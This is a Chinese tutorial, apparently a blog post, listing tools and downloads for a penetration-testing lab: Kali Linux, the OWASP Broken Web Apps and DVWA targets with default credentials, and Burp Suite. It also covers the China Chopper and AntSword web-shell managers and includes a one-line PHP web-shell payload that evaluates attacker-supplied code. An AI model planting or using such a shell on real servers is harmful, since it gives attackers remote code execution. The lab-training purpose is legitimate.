构建完善的安全渗透测试环境:推荐工具、资源和下载链接

数据来源

01 一些VM虚拟机的安装 

 攻击机kali:

kali官网

渗透测试工具Kali Linux安装与使用

kali汉化 

虚拟机网络建议设置成NAT模式,桥接有时不稳定。

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第1张图片

靶机OWASP_Broken_Web_Apps:

迅雷下载

网盘下载

安装教程

开机之后需要登录,默认的账号/密码:root       owaspbwa

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第2张图片

在浏览器中打开获取到的ip要根据自己的情况输入ip地址访问 

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第3张图片

默认的账号/密码:root       owaspbwa 

如果要管理这些网站的数据库,在访问的ip后面接上 /phpmyadmin  如:http://192.168.0.150/phpmyadmin/

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第4张图片

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第5张图片

如果要在真实机访问虚拟机的网站,就要在真实机开启VM虚拟对应的网卡,我这里虚拟机连接VM8所以这里就开启VM8

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第6张图片

windows10的虚拟机

Win7旗舰版_Windows8.1_Windows10 (虚拟机下载)

win10安装教程 (不包含安装到虚拟的教程,自己写的过不了审核)

02 一些渗透辅助工具的安装 

中国菜刀(C刀)

使用教程:

Cookie: 1=eval($_POST['cmd'])

中国蚁剑

安装教程一搜一大堆,我这里就讲一下使用教程

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第7张图片

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第8张图片

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第9张图片

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第10张图片

Burpsuite安装(windows)

前提:需要先安装教程内的JAVA环境

DVWA 漏洞靶场

Acunetix漏洞扫描工具 

xfp 7与xshell 7远程连接和管理服务器

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第11张图片

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第12张图片 

 构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第13张图片

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第14张图片

 HackBar

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第15张图片

演示一下如何发送post请求

构建完善的安全渗透测试环境:推荐工具、资源和下载链接_第16张图片

 

你可能感兴趣的:(Web安全渗透,安全)